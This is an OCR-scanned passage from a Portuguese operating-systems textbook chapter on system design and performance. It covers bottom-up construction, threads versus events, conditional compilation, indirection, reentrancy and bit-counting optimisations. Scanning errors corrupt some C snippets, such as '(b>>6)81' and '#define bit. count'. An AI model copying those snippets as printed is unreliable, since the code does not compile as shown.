poníveis no topo. Por essa razão, muitos desenvolvedo- 
res acham mais prático realmente construir o sistema no 
estilo de baixo para cima. Essa prática exige primeiro a 
escrita do código que oculta o hardware de baixo nível, 
basicamente a HAL na Figura 11.4. O tratamento de in- 
terrupção e o driver do relógio também são necessários 
antecipadamente. 

A multiprogramação pode ser resolvida com um es- 
calonador simples (por exemplo, escalonamento circu- 
lar). A partir de então, deve ser possível testar o sistema 
para averiguar se ele pode executar múltiplos proces- 
sos corretamente. Se o sistema funcionar, é o momento 
de começar a definição cuidadosa das várias tabelas e 
estruturas de dados necessárias em todo o sistema, em 
especial aquelas para o gerenciamento de processos e 
threads e também para o gerenciamento de memória. A 
E/S e o sistema de arquivos inicialmente podem esperar, 
exceto aquelas primitivas simples usadas para teste e 
depuração, como leitura do teclado e escrita na tela. Em 
alguns casos, as estruturas de dados principais de bai- 
xo nível devem ser protegidas, permitindo-se o acesso 
a elas somente por meio de procedimentos de acesso 
específicos — em consequência, por intermédio de pro- 
gramação orientada a objetos, não importando qual seja 
a linguagem de programação. Quando as camadas in- 
feriores estiverem completas, elas poderão ser testadas 
totalmente. Desse modo, o sistema avança de baixo para 
cima, como se constroem os grandes edifícios. 

Se existe um grande time de programadores, uma 
abordagem alternativa consiste em primeiro fazer um 
projeto detalhado do sistema todo e, depois, atribuir a 
diferentes grupos a escrita de diferentes módulos. Cada 
grupo testa seu próprio trabalho de maneira isolada. 
Quando todas as partes estiverem prontas, elas serão, 
então, integradas e testadas. O problema com esse tipo 
de investida é que, se nada funcionar inicialmente, pode 
ser difícil isolar um ou mais módulos que estão com 


funcionamento deficiente ou isolar um grupo que tenha 
se enganado sobre aquilo que determinado módulo de- 
veria fazer. Contudo, com times grandes, essa prática 
muitas vezes é usada para maximizar a quantidade de 
paralelismo durante o esforço de programação. 


12.3.8 Comunicação síncrona versus assincrona 


Outra questão que aparece com frequência em con- 
versas entre projetistas de sistema operacional é se as 
interações entre os componentes do sistema deverão 
ser síncronas ou assíncronas (e, relacionado com isso, 
se os threads são melhores que os eventos). A questão 
costuma levar a argumentos calorosos entre os propo- 
nentes dos dois lados, embora não os deixe com a boca 
espumando tanto quanto ao decidir questões realmente 
importantes — por exemplo, qual é o melhor editor, vi 
ou emacs. Usamos o termo “sincrona” no sentido (li- 
vre) da Seção 8.2 para indicar chamadas em que quem 
chamou fica bloqueado até que terminem. Do contrário, 
com chamadas “assíncronas”, quem chamou continua 
executando. Existem vantagens e desvantagens nos dois 
modelos. 

Alguns sistemas, como Amoeba, realmente abraçam 
o projeto síncrono e implementam a comunicação en- 
tre os processos como chamadas cliente-servidor que 
causam bloqueio. A comunicação totalmente síncrona 
é muito simples em conceito. Um processo envia uma 
solicitação e fica bloqueado aguardando até que chegue 
uma resposta — o que poderia ser mais simples? Isso se 
torna um pouco mais complicado quando existem mui- 
tos clientes, todos pedindo atenção do servidor. Cada 
solicitação individual poderia ficar bloqueada por muito 
tempo, aguardando que outras solicitações fossem con- 
cluídas primeiro. Isso pode ser resolvido tornando o ser- 
vidor multithreaded, de modo que cada thread pudesse 
tratar de um cliente. O modelo foi experimentado e tes- 
tado em muitas implementações do mundo real, em sis- 
temas operacionais e também em aplicações do usuário. 

As coisas ficam ainda mais complicadas se os threads 
frequentemente lerem e gravarem estruturas de dados 
compartilhadas. Nesse caso, o uso de travas é inevitá- 
vel. Infelizmente, não é fácil acertar o uso de travas. A 
solução mais simples é lançar uma única trava grande 
para todas as estruturas de dados compartilhadas (seme- 
lhante à grande trava do núcleo). Sempre que um thread 
quiser acessar as estruturas de dados compartilhadas, 
ele terá que apanhar uma trava primeiro. Por questões 
de desempenho, um única trava grande não é uma boa 
ideia, pois os threads acabam esperando uns pelos outros 
o tempo todo, mesmo que não haja qualquer conflito. O 
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outro extremo, muitas microtravas de (partes de) estru- 
turas de dados individuais, é muito mais rápido, porém 
entra em conflito com nosso princípio norteador nume- 
ro um: simplicidade. 

Outros sistemas operacionais prepararam sua comu- 
nicação entre processos usando primitivas assíncronas. 
De certa forma, a comunicação assíncrona é ainda mais 
simples do que a síncrona. Um processo cliente envia 
uma mensagem a um servidor, mas, em vez de esperar 
que a mensagem seja entregue ou que uma resposta seja 
enviada de volta, ele apenas continua a execução. Cla- 
ro que isso significa que ele também recebe a resposta 
de forma assíncrona, e deverá se lembrar de qual soli- 
citação corresponde a ela, quando chegar. O servidor 
normalmente processa as solicitações (eventos) como 
um único thread em um loop de eventos. Sempre que a 
solicitação precisar que o servidor entre em contato com 
outros servidores para realizar mais processamento, ele 
envia uma mensagem assíncrona por conta própria e, 
em vez de ficar bloqueado, continua com a próxima so- 
licitação. Múltiplos threads não são necessários. Apenas 
com eventos de processamento de único thread, não po- 
derá ocorrer o problema de múltiplos threads acessando 
estruturas de dados compartilhadas. Por outro lado, um 
tratador de evento de longa duração torna lenta a res- 
posta do servidor de único thread. 

Se os threads ou os eventos são o melhor modelo de 
programação é uma questão que gera muita controvérsia, 
que agita os corações de zelosos pelos dois lados desde o 
clássico artigo de John Ousterhout: “Why threads are a 
bad idea (for most purposes)” — Por que os threads são 
uma má ideia (para a maioria dos propósitos) (1996). 
Ousterhout argumenta que os threads tornam tudo com- 
plicado sem necessidade: travas, depuração, callbacks, 
desempenho — para citar apenas alguns. Naturalmente, 
não seria uma controvérsia se todos concordassem. Al- 
guns anos depois do artigo de Ousterhout, Von Behren et 
al. (2003) publicaram um artigo intitulado “Why events 
are a bad idea (for high-concurrency servers)” — Por 
que os eventos são uma má ideia (para servidores de 
alta concorrência). Assim, a decisão sobre o modelo de 
programação correto é difícil, porém importante, para os 
projetistas de sistemas. Não existe um vencedor defini- 
tivo. Servidores web como apache abraçam firmemente 
a comunicação síncrona e os threads, mas outros, como 
lighttpd, são baseados no paradigma orientado a even- 
tos. Ambos são populares. Em nossa opinião, os eventos 
em geral são mais fáceis de entender e depurar do que 
os threads. Desde que não haja necessidade de concor- 
rência por núcleo de processamento, eles provavelmente 
serão uma boa escolha. 
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12.3.9 Técnicas úteis 


Acabamos de analisar algumas ideias abstratas para 
o projeto e a implementação de sistemas. Agora exami- 
naremos técnicas concretas úteis para a implementação 
de sistemas. Existem inúmeras outras, obviamente, mas 
a limitação de espaço faz com que nos atenhamos a so- 
mente algumas delas. 


Escondendo o hardware 


Grande parte do hardware é feia. Ela precisa ser 
escondida o quanto antes (a menos que exponha po- 
der computacional, o que não ocorre na maior parte do 
hardware). Alguns dos detalhes de muito baixo nível 
podem ser escondidos por uma camada do tipo HAL, 
mostrada na Figura 12.2 como camada 1. No entanto, 
muitos detalhes do hardware não podem ser ocultados 
assim. 

Algo que merece atenção desde o início é como tra- 
tar as interrupções. Elas tornam a programação desa- 
gradável, mas os sistemas operacionais devem tratá-las. 
Uma solução é transformá-las de imediato em outra 
coisa. Por exemplo, cada interrupção pode ser trans- 
formada em um thread pop-up instantaneamente. Nes- 
se ponto, estaremos tratando com threads, em vez de 
interrupções. 

Uma segunda abordagem é converter cada interrup- 
ção em uma operação unlock sobre um mutex que o 
driver correspondente estiver esperando. Então, o único 
efeito de uma interrupção será de tornar algum thread 
pronto. 

Uma terceira estratégia é converter imediatamente 
uma interrupção em uma mensagem para algum thread. 
O código de baixo nível apenas deve construir uma 
mensagem dizendo de onde vem a interrupção, colocá- 
-la na fila e chamar o escalonador para (potencialmente) 
executar o tratador — que provavelmente estava blo- 
queado esperando pela mensagem. Todas essas técnicas 
e outras semelhantes tentam converter interrupções em 
operações de sincronização de threads. Fazer com que 
cada interrupção seja tratada por um thread apropriado 
em um contexto igualmente apropriado é mais fácil de 
gerenciar do que executar um tratador em um contexto 
arbitrário que ocorre por acaso. Claro, isso deve ser fei- 
to de modo eficiente, mas, nas profundezas do sistema 
operacional, tudo deve ser feito de forma eficiente. 

A maioria dos sistemas operacionais é projetada para 
executar em múltiplas plataformas de hardware. Essas 
plataformas podem ser diferentes em termos de chip de 
CPU, MMU, tamanho de palavra, tamanho de RAM 


e outras características que não podem ser facilmente 
mascaradas pelo HAL ou equivalente. Todavia, é muito 
desejável ter um conjunto único de arquivos-fonte que 
possam ser usados para gerar todas as versões; caso 
contrário, cada erro que aparecer posteriormente deve 
ser corrigido múltiplas vezes em diversos arquivos-fon- 
tes, com o risco de ficarem diferentes. 

Algumas variações no hardware — como o tamanho 
da RAM — podem ser tratadas pelo sistema operacio- 
nal, que deve determinar o valor no momento da inicia- 
lização e armazená-lo em uma variável. Os alocadores 
de memória, por exemplo, podem usar a variável que 
contém o tamanho da RAM para determinar qual será o 
tamanho da cache de blocos, das tabelas de páginas etc. 
Mesmo as tabelas estáticas, como a de processos, são 
passíveis de ser medidas com base no total de memória 
disponível. 

Contudo, outras diferenças, como diferentes chips 
de CPU, não podem ser resolvidas a partir de um úni- 
co código binário que determine em tempo de execução 
qual CPU está executando. Uma maneira de atacar o 
problema de uma origem e múltiplos alvos é o emprego 
da compilação condicional. Nos arquivos-fonte, alguns 
flags são definidos em tempo de compilação para as di- 
ferentes configurações, que, por sua vez, são usadas para 
agrupar os códigos dependentes de CPU, do tamanho da 
palavra, da MMU etc. Por exemplo, imagine um siste- 
ma operacional que deva ser executado na linha 1A32 de 
chips x86 (também chamados de x86-32) ou nos chips 
UltraSPARC, que precisam de códigos de inicialização 
diferentes. O procedimento init poderia ser escrito como 
mostra a Figura 12.6(a). Dependendo do valor de CPU, 
que é definido no arquivo cabeçalho config.h, é feito um 
ou outro tipo de inicialização. Como o binário real con- 
tém somente o código necessário para a máquina-alvo, 
não existe perda de eficiência nesse caso. 

Como um segundo exemplo, suponha que exista a 
necessidade de um tipo de dado Register, que deve ser 
de 32 bits para o IA32 e de 64 bits para o UltraSPARC. 
Esse caso pode ser tratado pelo código condicional da 
Figura 12.6(b) (presumindo que o compilador produza 
inteiros de 32 bits e inteiros longos de 64 bits). Uma vez 
que essa definição tenha sido feita (provavelmente em 
um arquivo cabeçalho incluído em toda parte), o pro- 
gramador pode apenas declarar as variáveis como do 
tipo Register e, com isso, saber que elas terão o tamanho 
correto. 

Claro, o arquivo cabeçalho, config.h, tem de ser defi- 
nido corretamente. Para o [A32 ele pode ser algo do tipo: 


#define CPU IA32 
#define WORD_LENGTH 32 


Capítulo 12 PROJETO DE SISTEMAS OPERACIONAIS | 701 


[FIGURA 12.6] (a) Compilação condicional dependente de CPU. (b) Compilação condicional dependente do tamanho da palavra. 


#include "config.h" 
init() 


{ 

#if (CPU == IA32) 

/* Inicialização do IA32 aqui. */ 
#endif 


#if (CPU == ULTRASPARC) 
/* Inicialização do UltraSPARC aqui. */ 
#endif 


(a) 


Para compilar o sistema para o UltraSPARC, um 
config.h diferente deve ser usado, com os valores corre- 
tos para o UltraSPARC — provavelmente algo do tipo: 


#define CPU ULTRASPARC 
#define WORD_LENGTH 64 


Alguns leitores podem querer saber por que CPU 
e WORD LENGTH são tratados por macros diferen- 
tes. Poderíamos com facilidade ter agrupado a defini- 
ção de Register com um teste sobre CPU, ajustando 
seu tamanho para 32 bits para o IA32 e 64 bits para o 
UltraSPARC. No entanto, essa não é uma boa solução. 
Considere o que ocorre quando posteriormente trans- 
portamos o sistema para o ARM de 32 bits. Seria preci- 
so adicionar uma terceira condicional à Figura 12.6(b) 
para o ARM. Fazendo da maneira como temos feito, 
torna-se necessário apenas incluir a linha 


#define WORD LENGTH 32 


ao arquivo config.h para o ARM. 

Esse exemplo ilustra o princípio da ortogonalidade 
discutido anteriormente. Os itens dependentes da CPU 
devem ser compilados condicionalmente com base na 
macro CPU, e tudo o que é dependente do tamanho da 
palavra deve usar a macro WORD LENGTH. Conside- 
rações similares servem para muitos outros parâmetros. 


Indireção 


Muitas vezes ouvimos dizer que não existe problema 
em ciência da computação que não possa ser resolvido 
com um outro nível de indireção. Embora essa afirma- 
ção seja um pouco exagerada, há algo de verdadeiro 
nela. Vamos considerar alguns exemplos. Em sistemas 
baseados no x86, quando uma tecla é pressionada, o 
hardware gera uma interrupção e coloca o número da 
tecla — em vez do código ASCII do caractere — em um 


#include "config.h" 


#if (WORD_LENGTH == 32) 
typedef int Register; 
#endif 


#if (WORD_LENGTH == 64) 
typedef long Register; 
#endif 


Register RO, R1, R2, R3; 
(b) 


registrador do dispositivo. Além disso, quando a tecla 
é liberada posteriormente, gera-se uma segunda inter- 
rupção, também com o número da tecla. Essa indireção 
permite que o sistema operacional use o número da te- 
cla para indexar uma tabela e obter o caractere ASCII, 
tornando fácil tratar os diferentes teclados usados no 
mundo todo, em diferentes países. Com a obtenção das 
informações de pressionamento e liberação de teclas, é 
possível usar qualquer tecla, como uma tecla Shift, visto 
que o sistema operacional sabe a sequência exata em 
que as teclas foram pressionadas e liberadas. 

A indireção também é empregada na saída dos da- 
dos. Os programas podem escrever caracteres ASCII na 
tela, mas esses caracteres são interpretados como índi- 
ces em uma tabela para a fonte de saída atual. A entrada 
na tabela contém o mapa de bits para o caractere. Essa 
indireção possibilita separar os caracteres das fontes. 

Outro exemplo de indireção é o uso dos números prin- 
cipais do dispositivo (major device numbers) no UNIX. 
Dentro do núcleo existe uma tabela indexada pelo núme- 
ro do dispositivo principal para os dispositivos de blocos 
e um outro para os dispositivos de caracteres. Quando 
um processo abre um arquivo especial, como /dev/hd0, o 
sistema extrai do i-node o tipo (bloco ou caractere) e os 
números principal e secundário do dispositivo e os inde- 
xa em uma tabela de driver apropriada para encontrar o 
driver. Essa indireção facilita a reconfiguração do siste- 
ma, pois os programas lidam com nomes simbólicos de 
dispositivos e não com nomes reais do driver. 

Ainda um outro exemplo de indireção ocorre nos 
sistemas baseados em trocas de mensagens que usam 
como destinatário da mensagem uma caixa postal em 
vez de um processo. Empregando a indireção por meio 
de caixas postais (em vez de nomear um processo como 
destinatário), obtém-se uma flexibilidade considerável 
(por exemplo, ter uma secretária para lidar com as men- 
sagens de seu chefe). 
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Nesse sentido, o uso de macros, como 
#define PROC TABLE SIZE 256 


também é uma forma de indireção, visto que o pro- 
gramador pode escrever código sem precisar saber o 
tamanho que a tabela realmente tem. É uma boa prá- 
tica atribuir nomes simbólicos para todas as constantes 
(exceto em alguns casos, como —1, 0 e 1) e colocá-los 
nos cabeçalhos com comentários explicando para que 
servem. 


Reusabilidade 


Com frequência é possível reutilizar o mesmo códi- 
go em contextos ligeiramente diferentes. E isso é uma 
boa ideia, uma vez que reduz o tamanho do código bi- 
nario e significa que o código tem de ser depurado ape- 
nas uma vez. Por exemplo, suponha que mapas de bits 
sejam empregados para guardar informação dos blocos 
livres de um disco. O gerenciamento de blocos do disco 
pode ser tratado por rotinas alloc e free que gerenciem 
os mapas de bits. 

Como uma solução mínima, essas rotinas devem 
funcionar para qualquer disco. Mas é possível fazer me- 
lhor que isso. As mesmas rotinas também podem fun- 
cionar para o gerenciamento de blocos da memória, de 
blocos na cache de blocos do sistema de arquivos e dos 
i-nodes. Na verdade, elas podem ser usadas para alocar 
e desalocar quaisquer recursos passíveis de ser linear- 
mente enumerados. 


Reentrância 


A reentrância se caracteriza pela possibilidade de o 
código ser executado duas ou mais vezes simultanea- 
mente. Em um multiprocessador, existe sempre o peri- 
go de que, enquanto uma CPU executa alguma rotina, 
outra CPU inicialize a execução da mesma rotina tam- 
bém, antes que a primeira tenha acabado. Nesse caso, 
dois (ou mais) threads em diferentes CPUs podem estar 
executando o mesmo código ao mesmo tempo. Essa si- 
tuação deve ser evitada usando mutexes ou outros me- 
canismos que protejam regiões críticas. 

No entanto, o problema também existe em um mo- 
noprocessador. Em particular, a maior parte de qual- 
quer sistema operacional trabalha com as interrupções 
habilitadas. Para trabalhar de outro modo, muitas inter- 
rupções seriam perdidas e o sistema não se mostraria 
confiável. Enquanto o sistema operacional está ocupa- 
do executando alguma rotina, P, é totalmente possível 


que uma interrupção ocorra e que o tratador de inter- 
rupção também chame P. Se as estruturas de dados de 
P estiverem em um estado inconsistente no momento 
da interrupção, o tratador verá esse estado inconsisten- 
te e falhará. 

Um outro caso claro dessa ocorrência é se P for o 
escalonador. Suponha que algum processo tenha usado 
seu quantum e o sistema operacional o tenha movido 
para o final de sua fila. Enquanto o sistema realiza a ma- 
nipulação da lista, a interrupção ocorre, tornando algum 
processo pronto, e, com isso, o escalonador é executado 
novamente. Com as filas em um estado de inconsistên- 
cia, o sistema provavelmente travará. Como consequén- 
cia, mesmo em um monoprocessador, é melhor que a 
maior parte do sistema operacional seja reentrante, com 
estruturas de dados críticas protegidas por mutexes e as 
interrupções sendo desabilitadas nos momentos em que 
não puderem ser toleradas. 


Força bruta 


O uso de força bruta para resolver problemas não 
tem sido bem visto nos últimos anos, mas é muitas ve- 
zes a melhor opção em nome da simplicidade. Todo 
sistema operacional tem muitas rotinas que raramente 
são chamadas ou operam com tão poucos dados que sua 
otimização não vale a pena. Por exemplo, não raro é 
necessário pesquisar várias tabelas e vetores dentro do 
sistema. O algoritmo da força bruta apenas mantém as 
entradas da tabela na mesma ordem em que estavam e a 
pesquisa linearmente quando algo deve ser procurado. 
Se o número de entradas é pequeno (digamos, menos 
de mil), o ganho pela ordenação da tabela ou pelo uso 
de uma função de ordenação é pequeno, mas o código é 
bem mais complexo e mais passível de erros. A ordena- 
ção ou o uso de tabela de espalhamento (que cuida dos 
sistemas de arquivo montados nos sistemas UNIX) não 
é realmente uma boa ideia. 

Obviamente, para funções que estejam no caminho 
crítico — como um chaveamento de contextos —, deve 
ser feito tudo para torná-las rápidas, mesmo que, para 
isso, elas precisem ser escritas em linguagem assembly 
(Deus me livre). Mas as partes grandes do sistema não 
estão no caminho crítico. Por exemplo, muitas chama- 
das de sistema raramente são chamadas. Se houver um 
fork a cada segundo e este levar 1 ms para executar, en- 
tão, mesmo que ele seja otimizado para 0, o ganho será 
de apenas 0,1%. Se o código otimizado for maior e tiver 
mais erros, pode não ser interessante se importar com a 
otimização. 


Primeiro verificar os erros 


Muitas chamadas de sistema podem falhar por uma 
série de razões: o arquivo a ser aberto pertence a outro 
usuário; a criação de processos falha porque a tabela de 
processos está cheia; ou um sinal não pode ser enviado 
porque o processo-alvo não existe. O sistema operacio- 
nal deve verificar cuidadosamente cada possível erro 
antes de executar a chamada. 

Muitas chamadas de sistema também requerem a 
aquisição de recursos, como as entradas da tabela de 
processos, as entradas da tabela de i-nodes ou descri- 
tores de arquivos. Um conselho geral que pode evitar 
muita dor de cabeça é primeiro verificar se a chamada 
de sistema pode de fato ser realizada antes da aquisição 
de qualquer recurso. Isso significa colocar todos os tes- 
tes no início da rotina que executa a chamada de siste- 
ma. Cada teste deve ser da forma 


if (error condition) return(ERROR CODE); 


Se a chamada conseguir passar pelos testes em todo 
o caminho, então ela certamente será bem-sucedida. 
Nesse momento, os recursos podem ser adquiridos. 

Intercalar os testes com a aquisição de recursos im- 
plica que, se algum teste falhar ao longo do caminho, 
todos os recursos adquiridos até aquele ponto deverão 
ser devolvidos. Se um erro ocorrer e algum recurso 
não for devolvido, nenhum dano é causado de imedia- 
to. Por exemplo, uma entrada da tabela de processos 
pode apenas tornar-se permanentemente indisponível. 
Isso não é grande coisa. Porém, dentro de um certo 
período de tempo, esse erro poderá ocorrer múltiplas 
vezes. Por fim, a maior parte das entradas da tabela 
de processos poderá se tornar indisponível, levando a 
uma queda do sistema — muitas vezes imprevisível e 
de difícil depuração. 

Diversos sistemas sofrem desse problema, que se 
manifesta na forma de perda de memória. Em geral, o 
programa chama malloc para alocar espaço, mas esque- 
ce de chamar free posteriormente para liberá-lo. Aos 
poucos, toda a memória desaparece até que o sistema 
seja reinicializado. 

Engler et al. (2000) propuseram um modo de verifi- 
car alguns desses erros em tempo de compilação. Eles 
observaram que o programador conhece muitas inva- 
riantes que o compilador não conhece — como quando 
você aplica um lock em um mutex: todos os caminhos 
a partir desse lock devem conter um unlock e mais ne- 
nhum outro lock sobre o mesmo mutex. Eles elaboraram 
um jeito de o programador dizer isso ao compilador, 
instruindo-o a verificar todos os caminhos em tempo de 
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compilação para as violações daquela invariante. O pro- 
gramador pode também, entre muitas outras condições, 
especificar que a memória alocada deve ser liberada em 
todos os caminhos. 


12.4 Desempenho 


Considerando que todas as características são iguais, 
um sistema operacional rápido é melhor do que um len- 
to. No entanto, um sistema operacional rápido e não 
confiável não é tão bom quanto um outro lento e confi- 
ável. Visto que as otimizações complexas muitas vezes 
geram erros, é importante usá-las com cautela. Apesar 
disso, há locais em que o desempenho é crítico e as oti- 
mizações são bem importantes e, assim, todo esforço é 
válido. Nas seções a seguir, veremos algumas técnicas 
gerais para melhorar o desempenho nos pontos em que 
as otimizações são necessárias. 


12.4.1 Por que os sistemas operacionais são 
lentos? 


Antes de falar sobre as técnicas de otimização, é im- 
portante destacar que a lentidão de muitos sistemas ope- 
racionais é causada em grande parte por eles próprios. 
Por exemplo, antigos sistemas operacionais, como o 
MS-DOS e a versão 7 do UNIX, inicializavam em pou- 
cos segundos. Os sistemas UNIX modernos e o Windows 
8 podem levar minutos para inicializar, mesmo que exe- 
cutem em hardware mil vezes mais rápido. A justifica- 
tiva é que eles estão fazendo muito mais, querendo ou 
não. Veja um caso em questão. O recurso plug-and-play 
torna mais fácil instalar um novo dispositivo de hardware, 
mas 0 preço pago é que, em cada inicialização, o sis- 
tema operacional tem de inspecionar todo o hardware 
para averiguar se existem novos dispositivos. Essa var- 
redura do barramento leva tempo. 

Uma alternativa (melhor, na opinião dos autores) se- 
ria remover o recurso plug-and-play e manter um ícone 
na tela dizendo “Instalar novo hardware”. Na instalação 
de um novo dispositivo de hardware, o usuário deveria 
clicar nesse ícone para iniciar a varredura do barramen- 
to, em vez de fazê-la em cada inicialização. Os proje- 
tistas dos sistemas atuais estavam cientes dessa opção, 
claro. Eles a rejeitaram, basicamente, porque presumi- 
ram que os usuários são bastante estúpidos e incapazes 
de fazer essa operação corretamente (mas é claro que 
diriam isso de forma mais sutil aos usuários). Esse é 
apenas um exemplo, mas existem muitos outros, em que 
o desejo de tornar o sistema “amigável ao usuário” (ou 
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“imune a idiotas”, dependendo do ponto de vista) torna- 
-o lento para todos. 

Provavelmente a única grande coisa que os proje- 
tistas de sistemas podem fazer para melhorar o desem- 
penho é serem muito mais seletivos na adição de novas 
características. A pergunta que devemos fazer não é se 
os usuários gostarão disso, mas se esta característica 
vale o preço inevitável a ser pago no tamanho do códi- 
go, em velocidade, complexidade e confiabilidade. Só 
quando as vantagens claramente pesam mais do que as 
desvantagens é que a característica deve ser incluída. 
Os programadores tendem a presumir que o tamanho do 
código e a quantidade de defeitos serão O e a velocidade 
será infinita. A experiência mostra que essa visão é um 
tanto otimista. 

Outro fator importante é o marketing do produto. 
No momento em que a versão 4 ou 5 de algum produto 
atingiu o mercado, provavelmente todas as caracteris- 
ticas realmente úteis já foram incluídas e a maioria das 
pessoas que precisam desse produto já foi comprá-lo. 
Para manter as vendas em andamento, muitos fabrican- 
tes, apesar disso, continuam produzindo novas versões, 
com mais características, podendo, assim, vender suas 
atualizações a seus clientes. Adicionar novas caracte- 
rísticas só por adicionar pode ajudar nas vendas, mas 
raramente melhora o desempenho. 


12.4.2 O que deve ser otimizado? 


Como regra, a primeira versão de um sistema deve 
ser tão direta quanto possível. As únicas otimizações 
devem ocorrer nas partes que obviamente podem cau- 
sar problemas inevitáveis. Ter uma cache de blocos para 
o sistema de arquivos é um exemplo. Uma vez que o 
sistema está ativo e em execução, medidas cautelosas 
precisam ser tomadas para ver onde o tempo está real- 
mente sendo gasto. Com base nesses números, otimi- 
zações devem ser feitas nos pontos em que elas forem 
mais necessárias. 

Eis uma história verdadeira em que uma otimização 
danificou mais do que ajudou: um dos alunos (o qual 
manterei no anonimato) de um dos autores (AST) escre- 
veu o programa mkfs original do MINIX. Esse programa 
cria um novo sistema de arquivos em um disco recém- 
-formatado. O estudante levou cerca de seis meses para 
otimizar esse programa, inclusive inserindo o uso de 
cache do disco. Quando ele executou o programa, este 
não funcionou e precisou de vários outros meses de de- 
puração. Esse programa geralmente executa uma única 
vez no disco rígido durante toda a vida do computador, 
quando o sistema é instalado. Além disso, executa uma 


única vez para cada disco que é formatado. Cada execu- 
ção gasta em torno de dois segundos. Mesmo que a ver- 
são não otimizada gastasse um minuto, mostrou-se um 
desperdício de recursos gastar tanto tempo otimizando 
um programa raramente usado. 

Um slogan que pode ser aplicado à otimização de 
desempenho é: 


O que é bom o suficiente é suficientemente bom. 


Com isso, entendemos que, uma vez que o desem- 
penho alcançou um nível razoável, provavelmente não 
valerá a pena o esforço e a complexidade para melho- 
rar mais alguns poucos percentuais. Se o algoritmo de 
escalonamento é razoavelmente justo e mantém a CPU 
ocupada 90% do tempo, ele está fazendo seu trabalho. 
Inventar outro muito mais complexo que seja 5% me- 
lhor provavelmente será uma má ideia. Da mesma ma- 
neira, se a taxa de paginação está baixa o suficiente e 
não é um gargalo, uma grande empreitada que buscasse 
melhorar o desempenho não valeria a pena. Evitar de- 
sastres é muito mais importante do que otimizar o de- 
sempenho, especialmente visto que aquilo que é ótimo 
em determinada carga de trabalho pode não ser ótimo 
em outra. 

Outra questão é o que otimizar e quando. Alguns 
programadores tendem a otimizar até a morte tudo o 
que desenvolverem, logo que ele pareça funcionar. O 
problema é que, após a otimização, o sistema pode ser 
menos limpo, tornando-se mais difícil de manter e de- 
purar. Além disso, isso o torna mais difícil de adaptação, 
e talvez realizar uma otimização mais lucrativa depois. 
O problema é conhecido como otimização prematura. 
Donald Knuth, também conhecido como o pai da análi- 
se de algoritmos, disse certa vez que “a otimização pre- 
matura é a raiz de todos os males”. 


12.4.3 Ponderações espaço/tempo 


Uma abordagem geral para melhorar o desempenho 
consiste em ponderar o tempo versus o espaço. É fre- 
quente em ciência da computação uma situação de es- 
colha entre um algoritmo que usa pouca memória, mas 
é lento, e outro algoritmo que usa muito mais memória, 
porém é mais rápido. Quando se faz uma otimização 
importante, vale a pena procurar por algoritmos que ga- 
nham velocidade com o uso de mais memória ou, de 
modo oposto, economizam memória preciosa com a re- 
alização de mais computação. 

Uma técnica em geral útil visa a substituir procedi- 
mentos pequenos por macros. O uso de macros elimina 
o overhead normalmente associado a uma chamada de 


procedimento. O ganho é especialmente significativo 
quando a chamada ocorre dentro de um laço. Como 
exemplo, suponha que usemos mapas de bits para man- 
ter o controle dos recursos e precisemos saber com 
frequência quantas unidades estão livres em alguma 
parte do mapa de bits. Para isso, torna-se necessário um 
procedimento, bit count, que conta o número de bits 1 
em um byte. O procedimento óbvio é dado na Figura 
12.7(a). Ele percorre os bits do byte, contando-os um 
por vez, sendo bastante simples e direto. 

Esse procedimento possui duas fontes de inefici- 
ência. Primeiro, ele deve ser chamado, um espaço na 
pilha deve ser alocado para ele e depois ele deve re- 
tornar. Cada chamada de procedimento apresenta esse 
overhead. Segundo, ele contém um loop e sempre existe 
algum overhead associado a um loop. 

Uma estratégia completamente diferente é usar a ma- 
cro da Figura 12.7(b). É uma expressão em sequência 
que calcula a soma dos bits por meio de deslocamentos 
sucessivos do argumento, mascarando tudo, exceto o bit 
de ordem mais baixa, e somando os oito termos. A ma- 
cro dificilmente é um trabalho de arte, mas ela aparece 
no código apenas uma vez. Quando a macro é chamada, 
por exemplo, por 

sum = bit count(table[i]); 
ela parece idêntica à chamada do procedimento. Assim, 
a não ser pela definição um tanto quanto bagunçada, o 
código não fica pior com o uso de macro do que com 
o uso do procedimento, mas ele se torna muito mais 
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eficiente, visto que elimina tanto o overhead da chama- 
da de procedimento quanto aquele causado pelo uso do 
loop. 

Podemos levar esse exemplo um passo mais adian- 
te. Para que calcular a contagem de bits? Por que não 
pesquisar o contador em uma tabela? Afinal de contas, 
existem somente 256 bytes diferentes, cada um com um 
valor único entre O e 8. Podemos declarar uma tabela de 
256 entradas, bits, com cada entrada inicializada (em 
tempo de compilação) com o contador de bits corres- 
pondente aquele valor do byte. Com essa tática, nenhu- 
ma computação é necessária em tempo de execução, 
mas apenas uma operação de indexação. Uma macro 
que realiza esse trabalho é dada na Figura 12.7(c). 

Este é um exemplo claro de ponderação entre o tem- 
po de computação e o uso de memória. Contudo, po- 
demos ir ainda mais longe. Se quisermos contar os bits 
em palavras de 32 bits, usando nossa macro bit count, 
precisaremos executar quatro pesquisas por palavra. Se 
expandirmos a tabela para 65.536 entradas, poderemos 
reduzir para duas pesquisas por palavra, com o custo de 
uma tabela muito maior. 

A pesquisa de respostas em tabelas pode ser usada 
de outras maneiras. Uma técnica de compactação bem 
conhecida, GIF, usa a pesquisa em tabela para codificar 
pixels RGB de 24 bits. Entretanto, a GIF só funciona so- 
bre imagens de 256 cores ou menos. Para cada imagem 
a ser comprimida, cria-se uma palheta de 256 entradas, 
e nela cada entrada contém um valor RGB de 24 bits. A 


lc PA (a) Um procedimento para contar bits em um byte. (b) Uma macro para contar bits. (c) Uma macro que conta bits pela 


consulta a uma tabela. 


define BYTE SIZE 8 
int bit count(int byte) 


{ 
int i, count = 0; 
for (i = 0; i < BYTE_SIZE; i++) 
if ((byte >> i) & 1) count++; 
return(count); 
} 


(a) 


/* Um byte contem 8 bits */ 


/* Conta os bits em um byte */ 


/* percorre os bits de um byte */ 
/* se este bit e 1, incrementa contador */ 
/* retorna soma */ 


/*Macro que soma os bits em um byte e retorna a soma. */ 
#define bit. count(b) ((b&1) + ((b>>1)&1) + ((b>>2)&1) + ((b>>3)&1) + N 
((b>>4)&1) + ((b>>5)&1) + ((b>>6)81) + ((b>>7)&1)) 


(b) 


/*Macro que consulta o contador de bits em uma tabela. */ 
char bits[256] = {0, 1, 1, 2, 1, 2, 2,3, 1, 2, 2, 3, 2,3, 3,4, 1, 2, 2, 3, 2, 3, 3, ...}; 


#define bit_count(b) (int) bits[b] 
(c) 
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imagem compactada consiste, então, em um índice de 8 
bits para cada pixel em vez de um valor de 24 bits para 
cada cor — um ganho com fator de três. Essa ideia está 
ilustrada na Figura 12.8 para uma seção 4 x 4 de uma 
imagem. A imagem compactada original é mostrada na 
